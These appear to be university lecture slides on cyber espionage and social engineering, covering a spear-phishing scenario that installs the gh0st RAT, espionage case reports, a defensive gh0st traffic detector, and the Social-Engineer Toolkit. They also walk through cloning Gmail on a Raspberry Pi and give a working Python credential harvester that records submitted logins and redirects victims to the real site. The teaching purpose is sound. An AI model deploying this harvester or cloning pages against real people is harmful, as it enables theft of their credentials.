Cyber Espionage and Social Engineering Attacks
Chien-Chung Shen, cshen@udel.edu
Can a well-engineered network be broken into?
• Consider an agent X who is determined to break into a network in order to steal valuable documents belonging to an organization and to conduct general espionage on the organization's activities
• Assume that the targeted organization
– is vigilant about keeping up to date with patches and anti-virus signature updates
– operates behind a well-designed firewall
– hires a security company to periodically carry out vulnerability scans and penetration tests of all its computers
– enforces password policies so that its computers are not vulnerable to dictionary attacks
• In addition, assume that X is physically based in a different country, so it is not possible for X to enter the organization's premises and install a packet sniffer on its LAN
Can a well-engineered network be broken into? (cont.)
• Given the assumptions listed above, it would seem that the organization's network cannot be broken into
• That turns out not to be the case. Any network, no matter how secure it is from a purely engineering perspective, can be compromised through what is now commonly referred to as "social engineering": attacking the people the network trusts rather than the network itself
Episode (1)
• Assume that an individual named Bob Clueless is a high official in company A in the US and that this company manufactures night-vision goggles for the military
• Suppose there is a country T that is barred from importing military hardware, including night-vision goggles, from the US. T decides to steal the design documents stored in the computers of organization A. Since T does not want to be implicated in cross-border theft, it outsources the job to a local hacker named X
• T supplies X with all kinds of information (gathered by its embassy in the US) regarding A, its supplier base, the cost structure of its products, and so on. On the basis of this information, X sends the following email to Bob Clueless:
Episode (2)
To: Bob Clueless
From: Joe Smoothseller
Subject: Lower cost light amplifier units
Dear Bob,
We are a low-cost manufacturer of light-amplifier units. Our costs are low because we pay next to nothing to our workers. (Our workers do not seem to mind --- but that's another story.)
The reason for writing to you is to explore the possibility of us becoming your main supplier for the light amplification unit. The attached document shows the pricing for the different types of light-amplification units we make.
Please let me know soon if you would be interested in our light amplifier units.
Attachment: light-amplifiers.docx
Episode (3)
• When Bob Clueless received the above email, he was already under a great deal of stress because his company had recently lost significant market share in night-vision goggles to a competing firm. So no sooner did Bob receive the email than he opened the attachment
• What Bob did not realize was that opening the attachment executed a small binary payload embedded in the document. That payload downloaded and installed the gh0st client, the implant half of the gh0st RAT trojan, on Bob's computer
• From then on, X had full remote access to the computer owned by Bob Clueless
– X used Bob's computer to infiltrate the rest of company A's network; this was the easiest part of the attack, since the other computers trusted Bob's computer
– It is further told that, for cheap laughs, X would occasionally turn on the camera and microphone of Bob's laptop and catch Bob picking his nose and making other bodily sounds in the privacy of his office
Steps of a Social Engineering Attack
• You receive a spoofed e-mail with an attachment
• The e-mail appears to come from someone you know
• The contents make sense and talk about real things (and in your language)
• The attachment is a PDF, DOC, PPT or XLS
• When you open the attachment, you get a document on your screen that makes sense, but you also get exploited at the same time
• The exploit drops a hidden remote access trojan (RAT), typically a Poison Ivy or Gh0st RAT variant
– https://www.f-secure.com/v-descs/backdoor_w32_poisonivy.shtml
– http://hack2learn.blogspot.com/2011/04/rat-tutorial-poison-ivy.html
– http://en.wikipedia.org/wiki/Ghost_Rat
• You are the only one in your organization who receives such an email, so there is no mass-mailing pattern for a gateway filter to notice
Trojan
• From the standpoint of the programming involved, there is no significant difference between a bot and a trojan
• The main difference between a trojan and a bot relates to how they are packaged for delivery to an unsuspecting computer
– bot: spreads opportunistically, hopping to whatever machines it can reach
– trojan: delivered to a chosen target, typically disguised as something the target wants
• A trojan may be embedded in a piece of code that actually does something useful but, at the same time, also does things that are malicious
• Sample CERT advisory on trojans (CA-1999-02, Trojan Horses)
– http://www.cert.org/historical/advisories/CA-1999-02.cfm
Challenge in Social Engineering
Nagaraja and Anderson (University of Cambridge), The Snooping Dragon:
"This combination of well-written malware with well-designed email lures, which we call social malware, is devastatingly effective... The traditional defense against social malware in government agencies involves expensive and intrusive measures that range from mandatory access controls to tiresome operational security procedures. These will not be sustainable in the economy as a whole. Evolving practical low-cost defenses against social-malware attacks will be a real challenge."
The gh0st RAT Trojan
• Probably the most potent trojan currently in the news. That is not surprising: once a machine is compromised with this trojan, the attackers gain total control of it. They can turn on its camera and microphone remotely and capture all keyboard and mouse events, so in addition to running any program on the infected machine, they can listen in on conversations near it and watch what is going on in front of it
• The trojan targets Windows machines and appears to be the main trojan of its kind employed today for cyber espionage. Its source code is public, so many variants exist (the Norman report below catalogs them)
• The Many Faces of Gh0st Rat (Norman): http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf
• Know Your Digital Enemy (McAfee Foundstone): http://www.mcafee.com/us/resources/white-papers/foundstone/wp-know-your-digital-enemy.pdf
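The total control described above is exercised over a command channel with a fixed framing, and that framing is the classic network indicator for the family. As an added example for these notes (not code from the slides or from either report above), the following Python builds and parses gh0st-style frames and runs the parser over reconstructed TCP payloads to flag them. The frame layout, a 5-byte tag, a little-endian total length, a little-endian uncompressed length and a zlib body, is the one documented in the Norman report; the flows, addresses and beacon contents are constructed for the demonstration and are not captured traffic.

```python
import struct
import zlib

# Wire format of the original gh0st RAT command channel, as documented in the
# Norman report cited above: a 5-byte tag ("Gh0st" in the released source; the
# many variants swap in another 5-byte tag), a little-endian uint32 giving the
# total frame length including this 13-byte header, a little-endian uint32
# giving the payload length before compression, then the payload compressed
# with zlib.  Every gh0st frame in either direction uses it.
HEADER_LEN = 13
KNOWN_TAGS = (b"Gh0st",)  # extend with the variant tags seen in your environment


def build_gh0st_packet(payload: bytes, tag: bytes = b"Gh0st") -> bytes:
    """Wrap `payload` in a gh0st-style frame (used here only to make test traffic)."""
    if len(tag) != 5:
        raise ValueError("tag must be exactly 5 bytes")
    compressed = zlib.compress(payload)
    return tag + struct.pack("<II", HEADER_LEN + len(compressed), len(payload)) + compressed


def parse_gh0st_packet(data: bytes, tags=KNOWN_TAGS):
    """Return (tag, payload) if `data` begins with a well-formed gh0st frame, else None.

    Both length fields are checked against the bytes actually present before
    zlib is touched, and inflation is capped at the declared length, so a
    crafted header cannot make the detector read past the frame or inflate
    more than the frame promises (a decompression bomb).
    """
    if len(data) < HEADER_LEN or data[:5] not in tags:
        return None
    total_len, orig_len = struct.unpack("<II", data[5:HEADER_LEN])
    if total_len < HEADER_LEN or total_len > len(data):
        return None
    inflater = zlib.decompressobj()
    try:
        # max_length=0 would mean "unbounded", so a declared length of 0 is
        # capped at 1 byte: an empty stream still ends cleanly, a bomb does not.
        payload = inflater.decompress(data[HEADER_LEN:total_len], max(orig_len, 1))
    except zlib.error:
        return None
    # The stream must end exactly where the header says it does.
    if not inflater.eof or inflater.unconsumed_tail or len(payload) != orig_len:
        return None
    return data[:5], payload


def scan_tcp_payloads(payloads):
    """Run the parser over (flow_id, payload) pairs; return (flow_id, tag, payload_len) hits."""
    hits = []
    for flow_id, payload in payloads:
        parsed = parse_gh0st_packet(payload)
        if parsed is not None:
            tag, body = parsed
            hits.append((flow_id, tag.decode("ascii", "replace"), len(body)))
    return hits


# Constructed sample traffic (not captured from a real infection): one gh0st
# frame, one ordinary HTTP request, one frame whose header lies about the
# uncompressed size, and one frame with the tag but garbage after the header.
SAMPLE_BEACON = build_gh0st_packet(b"\x01WIN-BOBC|Windows 7|bob|fake-beacon-body")
LYING_HEADER = SAMPLE_BEACON[:9] + struct.pack("<I", 1_000_000) + SAMPLE_BEACON[13:]
SAMPLE_PAYLOADS = [
    ("10.0.0.5:49210->203.0.113.7:80", SAMPLE_BEACON),
    ("10.0.0.5:49211->198.51.100.9:80", b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"),
    ("10.0.0.6:49300->203.0.113.7:80", LYING_HEADER),
    ("10.0.0.7:49400->203.0.113.7:80", b"Gh0st" + struct.pack("<II", 32, 8) + b"notzlib" * 3),
]

if __name__ == "__main__":
    for hit in scan_tcp_payloads(SAMPLE_PAYLOADS):
        print("gh0st frame in flow %s (tag %s, %d payload bytes)" % hit)
```

Only the first sample flow is reported: the HTTP request fails the tag check, the lying header fails the post-inflation length check, and the garbage body raises a zlib error. Note that the frames ride over whatever port the operator chose (port 80 in the constructed samples), so a port-based rule is not a substitute for checking the framing itself.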
Cyber Espionage
• Tracking GhostNet: Investigating a Cyber Espionage Network (http://www.scribd.com/doc/13731776/Tracking-GhostNet-Investigating-a-Cyber-Espionage-Network) describes an espionage network that had infected at least 1295 computers in 103 countries, mostly for the purpose of spying on various Tibetan organizations, especially the offices of the Dalai Lama in Dharamsala, India
• Shadows in the Cloud: Investigating Cyber Espionage 2.0 (http://www.infowar-monitor.net/2010/04/shadows-in-the-cloud-an-investigation-into-cyber-espionage-2-0) documents an extensive espionage network that successfully stole from various high offices of the Government of India, the Office of the Dalai Lama, and the United Nations
• The Snooping Dragon: Social-Malware Surveillance of the Tibetan Movement (http://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-746.html)
• Cyberattack on Google Said to Hit Password System (http://www.nytimes.com/2010/04/20/technology/20google.html?_r=0)
Social Engineering Attacks
• Designed to trick a victim into providing information through misdirection or deceit
• Attackers often pretend to be someone they are not, such as someone with authority or a family member, to gain the victim's trust
• When they are successful, users may have given up passwords, access credentials, or other valuable secrets
• Many tools in Kali Linux assist with a social engineering campaign; however, the most successful attacks are based on understanding your target audience and abusing their trust
• e.g., obtaining sensitive information using fake accounts on social media sites such as LinkedIn and Facebook
• e.g., the "Emily Williams" experiment, in which a fabricated social-media persona was used to gain employees' trust and, through it, access
Social-Engineer Toolkit (SET)
• Developed by David Kennedy at TrustedSec; comes preinstalled with Kali Linux
• Often used to duplicate trusted websites such as Google, Facebook, and Twitter so as to attract victims and launch attacks against them
• As victims unknowingly browse these duplicate websites, attackers can gather their passwords or possibly inject a command shell that gives them full access to the victims' systems
• A great tool for security professionals to demonstrate the chain of trust as a vulnerability, i.e., to show that the average person does not pay attention to where they enter sensitive information as long as the source looks legitimate
• https://www.trustedsec.com/social-engineer-toolkit
Scenario
• Leverage a Raspberry Pi for on-site reconnaissance that can be used to build a successful social engineering attack executed from a remote web server
• Set up the Pi to clone Gmail
• The goal is to make a victim believe they are accessing their Gmail account: the cloned page stores the login credentials and then redirects the victim to the real Gmail website, so the victim sees nothing unusual
• The trick is to get the victim to access the SET server; that is where your social engineering abilities come into play. For example, you could e-mail a link, post the link on a social media site, or poison DNS to direct traffic to your attack server
• The attacker can remotely access the Raspberry Pi to pull down the stolen credentials
Launch SET
• Type setoolkit and enable the bleeding-edge repos
• Select Social-Engineering Attacks, then Website Attack Vectors, then the Credential Harvester Attack Method, then Site Cloner, to clone Gmail
• Input the local IP (the address of the Pi that the victim will connect to, which is where the cloned form posts back) and the site to clone (the Gmail login URL)
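What the Credential Harvester does once the victim reaches the Pi, as an added example written for these notes (it is not SET's code, which is at the TrustedSec link above): a minimal harvester in Python's standard library that serves a login form, records whatever is POSTed, and answers with a 302 to the real site. The hand-written form, the redirect target and the field names are assumptions for the demo; SET instead serves a cloned copy of the target page and logs captured fields to a file.

```python
import threading
import urllib.parse
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Where the victim is sent after the POST.  SET fills this in from the site it
# cloned; the value here is an assumption for the demo, not taken from the slides.
REAL_LOGIN_URL = "https://accounts.google.com/"

# Stand-in for the cloned page (assumption: SET serves a copy of the real login
# page with the form action rewritten to point at the harvester; this
# hand-written form plays that role so the demo is self-contained).
CLONED_PAGE = b"""<!doctype html><html><body>
<h2>Sign in</h2>
<form method="POST" action="/">
  <input name="user" placeholder="Email"><br>
  <input name="pass" type="password" placeholder="Password"><br>
  <button type="submit">Sign in</button>
</form></body></html>"""

HARVESTED = []  # credentials captured so far (SET writes them to a log file instead)


def harvest_form(body: bytes) -> dict:
    """Decode a urlencoded form body into a single-valued dict (blank fields kept)."""
    fields = urllib.parse.parse_qs(body.decode("utf-8", "replace"), keep_blank_values=True)
    return {name: values[0] for name, values in fields.items()}


def handle_login_post(body: bytes, client_ip: str):
    """Record the submitted fields and return (status, headers) for the reply.

    The reply is a 302 to the real site: the next thing the victim sees is the
    genuine login page and a second, successful sign-in, which is what keeps
    them from noticing anything.
    """
    record = harvest_form(body)
    record["client"] = client_ip
    HARVESTED.append(record)
    return 302, {"Location": REAL_LOGIN_URL, "Content-Length": "0"}


class HarvesterHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(CLONED_PAGE)))
        self.end_headers()
        self.wfile.write(CLONED_PAGE)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        status, headers = handle_login_post(self.rfile.read(length), self.client_address[0])
        self.send_response(status)
        for name, value in headers.items():
            self.send_header(name, value)
        self.end_headers()

    def log_message(self, format, *args):  # keep the console quiet
        pass


def start_harvester(host="127.0.0.1", port=0):
    """Serve the cloned page in a background thread; port 0 picks a free port."""
    server = ThreadingHTTPServer((host, port), HarvesterHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


if __name__ == "__main__":
    srv = start_harvester()
    print("harvester listening on http://%s:%d/" % srv.server_address)
    try:
        threading.Event().wait()  # run until Ctrl-C
    except KeyboardInterrupt:
        srv.shutdown()
```

Run it on a lab host, browse to the printed URL, submit the form: the browser lands on the real site and HARVESTED holds the fields plus the client address. The defender-side lesson is in the Location header: a login form that posts to one host and then bounces the user to another is exactly what a glance at the URL bar, or a password manager that only fills credentials on the matching domain, catches.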